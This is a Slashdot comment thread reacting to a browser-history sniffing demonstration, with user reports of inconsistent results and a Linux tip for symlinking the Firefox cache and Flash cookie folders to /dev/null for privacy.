Really? I call BS (1)

Lawrence_Bird (67278) | more than 2 years ago | (#38262142)

I ran this "test" three times in succession. First go it showed sites which yes I might have been to though one, Dogster I was fairly certain I had not. I then clicked it again and this time it came up with almost every site in green. Running a third time gave the same results as the first attempt.

Re:Really? I call BS (1)

Anonymous Coward | more than 2 years ago | (#38262416)

Think about how it works and you will see why it gives you different answers if you run it.

Re:Really? I call BS (1)

gl4ss (559668) | more than 2 years ago | (#38263490)

well, running safari it did get that I had visited slashdot.

going to facebook, it for some reason thought I had gone to twitter though.

(I know there's no "safari" version there, but the ie version did that)

lcamtuf doing great job again (0)

Anonymous Coward | more than 2 years ago | (#38262436)

makes me proud to be polish

Cache Experiment (Linux) (2, Interesting)

Anonymous Coward | more than 2 years ago | (#38262766)

I'm using Linux and I'm trying the same thing that I do with Adobe Flash... I /dev/null it...

cd to .mozilla/firefox/xxxxxxx.default (replace x's with your specific alphanumeric string)
rm -rf Cache (deletes Cache dir and all subfolders)
ln -s /dev/null Cache (creates symlink of Cache to /dev/null)

Since nothing escapes the event horizon that is /dev/null, your Cache is written but cannot be inspected by others seeking to pry into your well-deserved privacy.

So far, so good. I have noticed no slowness by doing this.

By the way, you can do this with Adobe Flash to prevent your LSO/Super/Flash cookies from being farmed as well.

In your home dir, delete both the .adobe and .macromedia dirs. Some distros only have one or the other. Debian and variants have both.

rm -rf .adobe .macromedia
ln -s /dev/null .adobe
ln -s /dev/null .macromedia

Now you can experience the benefits of Flash without exposing yourself to privacy concerns.

Re:Cache Experiment (Linux) (0)

Anonymous Coward | more than 2 years ago | (#38263308)

Linking a directory to /dev/null is semantically questionable.

You'd be better off creating the directory with mode 000 and make it immutable.

Convenience (2)

pentadecagon (1926186) | more than 2 years ago | (#38263630)

Convenience comes at a price.
You can buy your bread and butter at the local grocery with all your neighbors watching.
Or you can disguise and go to the other end of town, which takes time and increases traffic.
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...